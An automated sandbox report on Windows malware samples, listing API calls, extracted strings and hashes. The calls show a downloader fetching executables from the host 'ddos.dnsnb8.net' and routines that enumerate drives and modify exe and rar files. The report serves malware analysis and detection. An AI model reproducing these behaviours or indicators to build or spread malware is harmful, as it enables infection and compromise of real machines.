:@%l, xrefs: 0362036D

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: :@%l
API String ID: 0-1656731533
Opcode ID: f987a56ee651ca79ddbe2043c3258fd1a109db935f8d60e1fee8333273381a83
Instruction ID: 8f11e939a72a612b50524cce10b87b130cfa8becd1a2e0b210bd80a903ce66a6
Opcode Fuzzy Hash: f987a56ee651ca79ddbe2043c3258fd1a109db935f8d60e1fee8333273381a83
Instruction Fuzzy Hash: C931E9747102118FDB04E775D812BBF3BAA9B88308F51802DE405DBBA4DF398D1ACBA1

Function 007A0540 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 007A056B

Memory Dump Source

Source File: 00000000.00000002.2189110013.0000000000794000.00000040.00000001.01000000.00000003.sdmp, Offset: 0061C000, based on PE: true

Associated: 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189110013.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189110013.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_LisectAVT_2403002B_366.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5cce2fe32572c769e34f5b9ec55552e0fd50e4bbbbc8f4191c5bf5b3274122db
Instruction ID: ac9841ba4c67087d41aa773bdd86f2978b9cacdc90dfe7235e6a90837f5ef379
Opcode Fuzzy Hash: 5cce2fe32572c769e34f5b9ec55552e0fd50e4bbbbc8f4191c5bf5b3274122db
Instruction Fuzzy Hash: 1FE0ECB67001089BDB10CE4DD884F5A33ADA789310F108911F519D7605C239FC609BA5

Function 03620006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29aa5de75eed830bbaea3f53caa19f61e7d35c897af78443bf963936a6a5aac2
Instruction ID: ba549bb0395547e490f6be25445e0eac679421070e588d77e7d530404a2d9c19
Opcode Fuzzy Hash: 29aa5de75eed830bbaea3f53caa19f61e7d35c897af78443bf963936a6a5aac2
Instruction Fuzzy Hash: 7911803644E3C19FD7038B64D8A2A813FB4AF1321474E44EBD090CF1A7D66C690ADB72

Function 036201E1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ea3354dee18f4b1e9e50408131e07d5d82efd4c2a1e4ba61328151fc24d5930
Instruction ID: 2ac638d2e623463b69096753ae20a13fbf163582a234dadf727003ec39cbb862
Opcode Fuzzy Hash: 5ea3354dee18f4b1e9e50408131e07d5d82efd4c2a1e4ba61328151fc24d5930
Instruction Fuzzy Hash: 4B118B3421A342CFCB01EB76E5598987BF1FFC5348B48882DE4458F369EB729858DB52

Function 041505DF Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194398998.0000000004150000.00000040.00000020.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4150000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42c1b762f64ea9db5907554584a5b518f50055176212d1574cc88c1282544ab2
Instruction ID: bd392d3d55948cd76e8465a7650947561e9c87cd8ce15f46540600bbcba827fe
Opcode Fuzzy Hash: 42c1b762f64ea9db5907554584a5b518f50055176212d1574cc88c1282544ab2
Instruction Fuzzy Hash: F401DBB55493805FD701CB15EC40893BFE8DF8623070984AFE8498B612D225B909C771

Function 036200A8 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 566db1601539464f973f03ccb2f4365dae4cdc4d187bb7da280658839a04a234
Instruction ID: d2fe2b14d00e15b3ffaf007a65cde43e0667d6d9f9bac3447ac0e6a88eede49d
Opcode Fuzzy Hash: 566db1601539464f973f03ccb2f4365dae4cdc4d187bb7da280658839a04a234
Instruction Fuzzy Hash: 29F0C832A003046BE704DAB0DC12BAE7BB6EBC1624F1581BEE5459F2D1DA3298458780

Function 04150606 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194398998.0000000004150000.00000040.00000020.00020000.00000000.sdmp, Offset: 04150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4150000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d5e6358b2f1f9eac203391a38597a318d96ed3f63109ef56e1a66756876e7ca
Instruction ID: da871a5b08a6104c524331149660b422b2a5ead3dc667dbe86274c242ffbbff7
Opcode Fuzzy Hash: 3d5e6358b2f1f9eac203391a38597a318d96ed3f63109ef56e1a66756876e7ca
Instruction Fuzzy Hash: F0E09276A006008B9650CF0BFC81452F794EB84630B48C47FDC0D8BB11E276B548CAB5

Function 036236A8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2194038645.0000000003620000.00000040.00000800.00020000.00000000.sdmp, Offset: 03620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3620000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0caf57c03b8f29d217f878cfc640a8e2327afd76c7749915c3398a623b13ed2
Instruction ID: 0d5449dd82d93dac6f1a53fc7fde5dfaf18a11ea436fe49750d13b2d07828b31
Opcode Fuzzy Hash: a0caf57c03b8f29d217f878cfc640a8e2327afd76c7749915c3398a623b13ed2
Instruction Fuzzy Hash: E3E08C30246200CFC71A9B34E466C5C3B75AF8630D30808BDD4068B366DA3AE482DB00

Function 035023F4 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193183574.0000000003502000.00000040.00000800.00020000.00000000.sdmp, Offset: 03502000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3502000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b439ef0d786c6807d79a99414da9c3341ae4cb926f6379dfe82888b74eac8423
Instruction ID: 68254698e4f1775aafa3d958975b20891a7780488ed97b9c905502a83bc36f53
Opcode Fuzzy Hash: b439ef0d786c6807d79a99414da9c3341ae4cb926f6379dfe82888b74eac8423
Instruction Fuzzy Hash: A0D05E792066C14FE316DB1CD1A8F9577E4BB51708F4E48F9AC008B7B3C769E981D250

Function 035023BC Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2193183574.0000000003502000.00000040.00000800.00020000.00000000.sdmp, Offset: 03502000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3502000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0be51ed8a5e3352b4b2dca852ba0e74e92d9d9f2f9d10071c59dba27dd4fb919
Instruction ID: 449c169a84ddd2cb947ded41855f2a419d0b542b1728227ff790d1aae41834b2
Opcode Fuzzy Hash: 0be51ed8a5e3352b4b2dca852ba0e74e92d9d9f2f9d10071c59dba27dd4fb919
Instruction Fuzzy Hash: 31D05E342015814BDB15DF1CE6D9F9977D4BB40705F0A48E8AC108B7B2C3B5E881CA00

Non-executed Functions

Function 007A0914 Relevance: 9.7, Strings: 4, Instructions: 4749COMMON

Download Yara Rule

Strings

{y, xrefs: 007A13D8
|y, xrefs: 007A11A4
', xrefs: 007A122C
zy, xrefs: 007A13F0

Memory Dump Source

Source File: 00000000.00000002.2189110013.0000000000794000.00000040.00000001.01000000.00000003.sdmp, Offset: 0061C000, based on PE: true

Associated: 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189110013.0000000000767000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189110013.0000000000773000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_LisectAVT_2403002B_366.jbxd

Similarity

API ID:
String ID: '$zy${y$|y
API String ID: 0-1147786086
Opcode ID: 896cb78f5bee27c17d39645ab875cd7cac2b2fc60252073c7a8343890d6e3333
Instruction ID: f57fe140beb6ba010d201e66e4741a0137710663b346c630e3ae1905099d5910
Opcode Fuzzy Hash: 896cb78f5bee27c17d39645ab875cd7cac2b2fc60252073c7a8343890d6e3333
Instruction Fuzzy Hash: 8512F456A0D3D14FEF238B34D8692917FA15DA3364F9D06DAC1C0CB8A3E21CA41AD357

Analysis Process: RRqyIX.exePID: 4888, Parent PID: 6620COMMON

Execution Graph

Execution Coverage:	32.2%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	18.9%
Total number of Nodes:	297
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00AE29E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00AE2A02
wsprintfA.USER32 ref: 00AE2A1A
memset.MSVCRT ref: 00AE2A44
lstrlen.KERNEL32(?), ref: 00AE2A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00AE2A6C
strrchr.MSVCRT ref: 00AE2A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00AE2A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00AE2AAE
memset.MSVCRT ref: 00AE2AC6
memset.MSVCRT ref: 00AE2ADA
FindFirstFileA.KERNEL32(?,?), ref: 00AE2AEF
memset.MSVCRT ref: 00AE2B13
lstrcmpiA.KERNEL32(?,?), ref: 00AE2B42
FindNextFileA.KERNEL32(00000000,?,?,?,?), ref: 00AE2B67
FindClose.KERNEL32(00000000), ref: 00AE2B6E

Strings

%s*, xrefs: 00AE2A14
Documents and Settings, xrefs: 00AE2A8D, 00AE2A92, 00AE2A9A, 00AE2AAD
C:\, xrefs: 00AE2A2F

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
String ID: %s*$C:\$Documents and Settings
API String ID: 2826467728-110786608
Opcode ID: ea21193cb2fb46b61ff78d3c82b7b20929feff1d27eee4ca1b7885b673692615
Instruction ID: 37b4cc911b10a53ef366d25f55d55c9994b809b3428a99be22c0445809fe3d6a
Opcode Fuzzy Hash: ea21193cb2fb46b61ff78d3c82b7b20929feff1d27eee4ca1b7885b673692615
Instruction Fuzzy Hash: 7C4154B3804389AFDB20DBE1DC89EEB77ACEB84315F040929F544D7111E634DA5987A2

Function 00AE1099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74
stringsleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894

WinExec.KERNEL32(?,00000005), ref: 00AE10F1
lstrlen.KERNEL32(00AE4748), ref: 00AE10FA
wsprintfA.USER32 ref: 00AE112A
wsprintfA.USER32 ref: 00AE1143
URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00AE115B
lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00AE1169
Sleep.KERNEL32 ref: 00AE1179

Strings

cj/, xrefs: 00AE1135
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE1119
ddos.dnsnb8.net, xrefs: 00AE10C8, 00AE10CF, 00AE1140, 00AE1168
http://%s:%d/%s/%s, xrefs: 00AE10C2, 00AE1141
%s%.8X.exe, xrefs: 00AE1124

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1280626985-762681358
Opcode ID: c351b3643906983e61494b20671df90d57f35ebb617e02975c06937c5e9a6966
Instruction ID: b213c2dce80cb99363b756243fdad03395b43eb122538c3ea244bc2c060331dc
Opcode Fuzzy Hash: c351b3643906983e61494b20671df90d57f35ebb617e02975c06937c5e9a6966
Instruction Fuzzy Hash: EE218C769002D8BADF20DBA2DC88BAEBBBDAB09315F114199E501A7051D7749B85CFA0

Function 00AE1718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1729
SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00AE174C
SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00AE177C
__aulldiv.LIBCMT ref: 00AE1796
__aulldiv.LIBCMT ref: 00AE17A8

Strings

SOFTWARE\GTplus, xrefs: 00AE1742, 00AE176B
C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE1722
Time, xrefs: 00AE173D, 00AE1766

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: TimeValue__aulldiv$FileSystem
String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe$SOFTWARE\GTplus$Time
API String ID: 541852442-3604683582
Opcode ID: 85651223135da5671ebb956a246556467843416f515479a4cbdffb1689402a1e
Instruction ID: fc84aa5cc9c2bd1ac4c3ddab37bd104ef540d937c0825e23c22959791e38f470
Opcode Fuzzy Hash: 85651223135da5671ebb956a246556467843416f515479a4cbdffb1689402a1e
Instruction Fuzzy Hash: 98116072A00299BBEF109B96CCC9FEF7BBCEB44B14F108515FA10A7180D6B19A458B60

Function 00AE6076 Relevance: 11.1, APIs: 7, Instructions: 617
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00AE60BE
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AE60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AE6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE61A5

Memory Dump Source

Source File: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: e116db1bc47e51f5c2e8587e30b44ff4f7770dee733a513c56739a779e919742
Instruction ID: 5a2c8e0b09a00d56a98a9e97c8bdaf1600ca5daa1098a5679113ed5144d7d432
Opcode Fuzzy Hash: e116db1bc47e51f5c2e8587e30b44ff4f7770dee733a513c56739a779e919742
Instruction Fuzzy Hash: C31235B26087C58FDB328F25CC45BEA3BB0EF22350F1849AED9858B193D774A901C761

Function 00AE2B8C Relevance: 10.6, APIs: 7, Instructions: 74
threadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00AE2BA6
GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00AE2BB4
GetDriveTypeA.KERNEL32(?), ref: 00AE2BD3
CreateThread.KERNEL32(00000000,00000000,00AE2B7D,?,00000000,00000000), ref: 00AE2BEE
lstrlen.KERNEL32(?), ref: 00AE2BFB
WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00AE2C16
CreateThread.KERNEL32(00000000,00000000,00AE2845,00000000,00000000,00000000), ref: 00AE2C3A

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
String ID:
API String ID: 1073171358-0
Opcode ID: 2e0c942bc4b8b981c766f20cfeeb4ab60f0b67c4d4b2a65324a9f8f7b3e4ad72
Instruction ID: 5c7f5fa6c7ad3377ff9feec38fd6f4694aab5d2a9f2356503f26d261d9a6ed46
Opcode Fuzzy Hash: 2e0c942bc4b8b981c766f20cfeeb4ab60f0b67c4d4b2a65324a9f8f7b3e4ad72
Instruction Fuzzy Hash: 5321D2B28001CCAFEB20EFA5AC88EEE7B6DFB44344B240529F842D3151D7248E07CB61

Function 00AE1E6E Relevance: 30.4, APIs: 20, Instructions: 380
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFileAttributesA.KERNEL32(?,00000080,?,00AE32B0,00000164,00AE2986,?), ref: 00AE1EB9
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00AE1ECD
SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00AE1EF3
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00AE1F07
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00AE1F1D
FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00AE201E
memset.MSVCRT ref: 00AE20D8
memset.MSVCRT ref: 00AE20EA
memcpy.MSVCRT ref: 00AE222D
UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE2238
FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE224A
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22C6
SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22CB
SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22DD
WriteFile.KERNEL32(000000FF,00AE4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE22F7
WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE230D
FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00AE2322
UnmapViewOfFile.KERNEL32(?,?,00AE32B0,00000164,00AE2986,?), ref: 00AE2340
FindCloseChangeNotification.KERNEL32(?,?,00AE32B0,00000164,00AE2986,?), ref: 00AE234E
CloseHandle.KERNEL32(000000FF,?,00AE32B0,00000164,00AE2986,?), ref: 00AE2359

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
String ID:
API String ID: 307705342-0
Opcode ID: 57fa3112764aafa2be2202a48dfc8c6dcf09fdbdb31155607f27782a19ae9171
Instruction ID: 192fe4ab05526d6434d55aca0447c1b400ed0a6c7f411602258ddaf383850f7c
Opcode Fuzzy Hash: 57fa3112764aafa2be2202a48dfc8c6dcf09fdbdb31155607f27782a19ae9171
Instruction Fuzzy Hash: D2F17D71900299EFCF20DFA5DD85AADBBB9FF08314F104529E519AB6A1D730AE81CF50

Function 00AE1973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144
filesleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1992
CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
Sleep.KERNEL32(00000064), ref: 00AE19C6
wsprintfA.USER32 ref: 00AE19EC
CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65
FindCloseChangeNotification.KERNEL32(000000FF), ref: 00AE1A90
DeleteFileA.KERNEL32(?), ref: 00AE1AA7
VirtualFree.KERNEL32(00AE4E60,00000000,00008000), ref: 00AE1AC1

Strings

2, xrefs: 00AE19CF
%s%.8X.data, xrefs: 00AE19E6
C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE197C
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE19DB

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\RRqyIX.exe
API String ID: 2523042076-1261205569
Opcode ID: edd084a32271b4e6d57236eccb1982c35f87e1ca873b4b14548695e4cc15753a
Instruction ID: 9736ec814f0ba57ab24b1904f4f9fef0c096a11739bdbe126b3136f4c745cc5b
Opcode Fuzzy Hash: edd084a32271b4e6d57236eccb1982c35f87e1ca873b4b14548695e4cc15753a
Instruction Fuzzy Hash: 04512A719012A9AFCF20DF9ADDC8ABEBBB9EB04394F104579E515A7190D3709E41CB90

Function 00AE28B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00AE28D3
wsprintfA.USER32 ref: 00AE28F7
memset.MSVCRT ref: 00AE2925
wsprintfA.USER32 ref: 00AE2940

Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2A02
Part of subcall function 00AE29E2: wsprintfA.USER32 ref: 00AE2A1A
Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2A44
Part of subcall function 00AE29E2: lstrlen.KERNEL32(?), ref: 00AE2A54
Part of subcall function 00AE29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00AE2A6C
Part of subcall function 00AE29E2: strrchr.MSVCRT ref: 00AE2A7C
Part of subcall function 00AE29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00AE2A9F
Part of subcall function 00AE29E2: lstrlen.KERNEL32(Documents and Settings), ref: 00AE2AAE
Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2AC6
Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2ADA
Part of subcall function 00AE29E2: FindFirstFileA.KERNEL32(?,?), ref: 00AE2AEF
Part of subcall function 00AE29E2: memset.MSVCRT ref: 00AE2B13

strrchr.MSVCRT ref: 00AE2959
lstrcmpiA.KERNEL32(00000001,exe), ref: 00AE2974

Strings

%s\, xrefs: 00AE293A
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE29B3
rar, xrefs: 00AE2988
exe, xrefs: 00AE296D
%s%s, xrefs: 00AE28F1

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
API String ID: 3004273771-1791786966
Opcode ID: 3eb34a63df4f66bc542582a99ab58ade5452c7c198bc1423d8fb9d6068df27d4
